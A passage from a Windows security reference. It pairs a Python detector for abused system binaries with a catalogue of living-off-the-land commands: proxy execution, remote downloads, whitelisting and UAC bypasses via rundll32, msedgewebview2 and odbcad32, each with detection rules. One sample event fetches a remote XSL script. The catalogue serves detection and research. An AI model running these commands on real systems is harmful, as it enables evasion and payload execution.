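    "schtasks.exe": {r"c:\windows\system32", r"c:\windows\sy swow64".replace(" ", "")},
    "powershell.exe": {r"c:\windows\system32\windowspowershell\v1.0",
                       r"c:\windows\syswow64\windowspowershell\v1.0"},
    "control.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "wmpnscfg.exe": {r"c:\program files\windows media player",
                     r"c:\program files (x86)\windows media player"},
}
# stordiag -> schtasks/systeminfo/fltmc/powershell, unregmp2 /HideWMP -> wmpnscfg,
# WorkFolders -> control: any child of these parents deserves a look.
PROXY_PARENTS = {"stordiag.exe", "unregmp2.exe", "workfolders.exe"}

# <drive>:\path\file:stream (a second colon after the drive letter) is how the
# tar, wmic and wscript entries address an alternate data stream.  Heuristic:
# it does not follow a path across whitespace, so a quoted path with spaces
# is not matched.
ADS_RE = re.compile(r'[A-Za-z]:\\[^\s"\']*?:([^\s"\'\\]+)')
# wmic /format: pointing at an http(s) URL or a UNC share (remote XSL).
REMOTE_XSL_RE = re.compile(r'/format:\s*"?(?:https?://|\\\\)', re.IGNORECASE)
REMOTE_NODE_RE = re.compile(r'/node:', re.IGNORECASE)


def evaluate(event: dict) -> list:
    """Return the names of the IOCs that fire for one process-creation event."""
    image = event["Image"]
    cmdline = event.get("CommandLine", "")
    name = ntpath.basename(image).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    hits = []

    # Stordiag / Unregmp2 / WorkFolders IOC: a well-known name from the wrong place.
    image_dir = ntpath.dirname(image).lower().rstrip("\\")
    if name in EXPECTED_DIRS and image_dir not in EXPECTED_DIRS[name]:
        hits.append("renamed_binary_outside_expected_path")
    if parent in PROXY_PARENTS:
        hits.append("child_of_proxy_parent")

    # Tar / Wmic / Wscript IOC: an alternate data stream on the command line.
    if ADS_RE.search(cmdline):
        hits.append("ads_in_command_line")

    # Wmic IOCs: script fetched from a remote XSL, or process creation on another host.
    if name == "wmic.exe":
        if REMOTE_XSL_RE.search(cmdline):
            hits.append("wmic_remote_xsl")
        if REMOTE_NODE_RE.search(cmdline) and "process call create" in cmdline.lower():
            hits.append("wmic_remote_process_create")
    return hits


def scan(events: list) -> list:
    """Return (index, hits) for every event that triggers at least one IOC."""
    return [(i, hits) for i, e in enumerate(events) if (hits := evaluate(e))]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\stage\systeminfo.exe",
     "ParentImage": r"C:\Users\Public\stage\stordiag.exe", "CommandLine": "systeminfo.exe"},
    {"Image": r"C:\Windows\System32\systeminfo.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "systeminfo"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\lolbin\Windows Media Player\wmpnscfg.exe",
     "ParentImage": r"C:\Windows\System32\unregmp2.exe", "CommandLine": "wmpnscfg.exe"},
    {"Image": r"C:\Users\bob\Downloads\control.exe",
     "ParentImage": r"C:\Windows\System32\WorkFolders.exe", "CommandLine": "control.exe"},
    {"Image": r"C:\Windows\System32\tar.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"tar -cf C:\Users\Public\notes.txt:ads C:\Users\Public\docs"},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic.exe process get brief /format:"https://files.example.test/brief.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic.exe /node:"192.168.0.1" process call create "notepad.exe"'},
    {"Image": r"C:\Windows\System32\wbem\wmic.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic.exe os get caption"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], hits)
```

The directory check is deliberately a path comparison rather than a signature check: the entries above work precisely because the renamed payload keeps an expected file name, so only its location and its parent give it away. The ADS regex is a heuristic and should be tuned against your own telemetry before it is promoted to an alert.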
Usecase: Run a com object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL} Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml Resources: - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://twitter.com/notwhickey/status/1306023056847110144 Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Nick Tyrer Handle: '@NickTyrer' - Person: harr0ey Handle: '@harr0ey' - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: 
yml/OSBinaries/msedge_proxy.yml ================================================ --- Name: msedge_proxy.exe Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: - Person: Mert Daş Handle: '@merterpreter' ================================================ FILE: yml/OSBinaries/msedgewebview2.yml ================================================ --- Name: msedgewebview2.exe Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content. Author: Matan Bahar Created: 2023-06-15 Commands: - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess. 
Usecase: Proxy execution of binary Category: Execute Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. 
Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml - IOC: 'msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path' Resources: - Link: https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf Acknowledgement: - Person: Uriel Kosayev Handle: '@MalFuzzer' - Person: Hai Vaknin Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@Tamirye94' - Person: Matan Bahar Handle: '@Bl4ckShad3' ================================================ FILE: yml/OSBinaries/odbcad32.yml ================================================ --- Name: odbcad32.exe Description: ODBC Data Source Administrator to manage User/System DSNs and ODBC drivers. Author: 'Ekitji' Created: 2025-09-04 Commands: - Command: odbcad32.exe Description: Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter. Usecase: Execute a binary as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Application: GUI Full_Path: - Path: c:\windows\system32\odbcad32.exe - Path: c:\windows\syswow64\odbcad32.exe Detection: - IOC: odbcad32.exe spawning unexpected child processes. 
Resources: - Link: https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c Acknowledgement: - Person: amonitoring - Person: Ekitji Handle: '@eki_erk' ================================================ FILE: yml/OSBinaries/write.yml ================================================ --- Name: write.exe Description: 'Windows Write' Author: Michal Belzak Created: 2025-06-17 Commands: - Command: write.exe Description: 'Executes a binary provided in default value of `HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe`.' Usecase: Execute binary through legitimate proxy. This might be utilized to confuse detection solutions that rely on parent-child relationships. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 (before 24H2) Tags: - Execute: EXE - Requires: Registry Change Full_Path: - Path: 'C:\Windows\write.exe' - Path: 'C:\Windows\System32\write.exe' - Path: 'C:\Windows\SysWOW64\write.exe' Detection: - IOC: 'Changes to HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe' - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml Resources: - Link: https://gist.github.com/mblzk/b8c5ff7c2bd0fb2b385cc2fdd119874b Acknowledgement: - Person: Michal Belzak ================================================ FILE: yml/OSBinaries/wt.yml ================================================ --- Name: wt.exe Description: Windows Terminal Author: Nasreddine Bencherchali Created: 2022-07-27 Commands: - Command: wt.exe {CMD} Description: Execute a command via Windows Terminal. 
Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml Resources: - Link: https://twitter.com/nas_bench/status/1552100271668469761 Acknowledgement: - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OSLibraries/Advpack.yml ================================================ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll Code_Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml Resources: - Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - Link: https://twitter.com/bohops/status/974497123101179904 - Link: https://twitter.com/moriarty_meng/status/977848311603380224 Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) Handle: '@0rbz_' - Person: Moriarty (RegisterOCX - CMD) Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ================================================ FILE: 
yml/OSLibraries/Desk.yml ================================================ --- Name: Desk.cpl Description: Desktop Settings Control Panel Author: Hai Vaknin Created: 2022-04-21 Commands: - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr} Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr} Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml Resources: - Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt - Link: https://twitter.com/pabraeken/status/998627081360695297 - Link: https://twitter.com/VakninHai/status/1517027824984547329 - Link: https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files Acknowledgement: - Person: Rafael S Marques Handle: '@pegabizu' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' - Person: hai Handle: 
'@VakninHai' - Person: Christopher Peacock Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk' ================================================ FILE: yml/OSLibraries/Dfshim.yml ================================================ --- Name: Dfshim.dll Description: ClickOnce engine in Windows used by .NET Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass Privileges: User MitreID: T1127.002 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: ClickOnce - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSLibraries/Ieadvpack.yml ================================================ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. 
Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll} Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe} Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX {CMD} Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll Code_Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml Resources: - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - Link: https://twitter.com/pabraeken/status/991695411902599168 - Link: https://twitter.com/0rbz_/status/974472392012689408 Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) Handle: '@0rbz_' - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) Handle: '@pabraeken' ================================================ FILE: yml/OSLibraries/Ieframe.yml ================================================ --- Name: Ieframe.dll Description: Internet Browser DLL for translating HTML code. Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url} Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll Code_Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/bohops/status/997690405092290561 - Link: https://windows10dll.nirsoft.net/ieframe_dll.html Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSLibraries/Mshtml.yml ================================================ --- Name: Mshtml.dll Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta} Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)." Usecase: Launch an HTA application. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/pabraeken/status/998567549670477824 - Link: https://windows10dll.nirsoft.net/mshtml_dll.html Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OSLibraries/Pcwutl.yml ================================================ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe} Description: Launch executable by calling the LaunchApplication function. Usecase: Launch an executable. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll Detection: - Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/ - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://twitter.com/harr0ey/status/989617817849876488 - Link: https://windows10dll.nirsoft.net/pcwutl_dll.html Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ================================================ FILE: yml/OSLibraries/PhotoViewer.yml ================================================ --- Name: PhotoViewer.dll Description: Windows Photo Viewer Author: Avihay Eldad Created: 2025-06-22 Commands: - Command: rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL} 
Description: Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\Windows Photo Viewer\PhotoViewer.dll - Path: C:\Program Files (x86)\Windows Photo Viewer\PhotoViewer.dll Detection: - IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a remote URL (containing '://') as an argument Acknowledgement: - Person: Avihay Eldad Handle: '@avihayeldad' - Person: Tommy Warren ================================================ FILE: yml/OSLibraries/Scrobj.yml ================================================ --- Name: Scrobj.dll Description: Windows Script Component Runtime Author: Eral4m Created: 2021-01-07 Commands: - Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe} Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache. Usecase: Download file from remote location. 
Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: c:\windows\system32\scrobj.dll - Path: c:\windows\syswow64\scrobj.dll Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line Resources: - Link: https://twitter.com/eral4m/status/1479106975967240209 Acknowledgement: - Person: Eral4m Handle: '@eral4m' ================================================ FILE: yml/OSLibraries/Setupapi.yml ================================================ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf} Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. 
Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows Tags: - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll Code_Sample: - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct - Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml Resources: - Link: https://github.com/huntresslabs/evading-autoruns - Link: https://twitter.com/pabraeken/status/994742106852941825 - Link: https://windows10dll.nirsoft.net/setupapi_dll.html Acknowledgement: - Person: Kyle Hanslovan (COM Scriptlet) Handle: '@KyleHanslovan' - Person: Huntress Labs (COM Scriptlet) Handle: '@HuntressLabs' - Person: Casey Smith (COM Scriptlet) Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ================================================ FILE: yml/OSLibraries/Shdocvw.yml ================================================ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. 
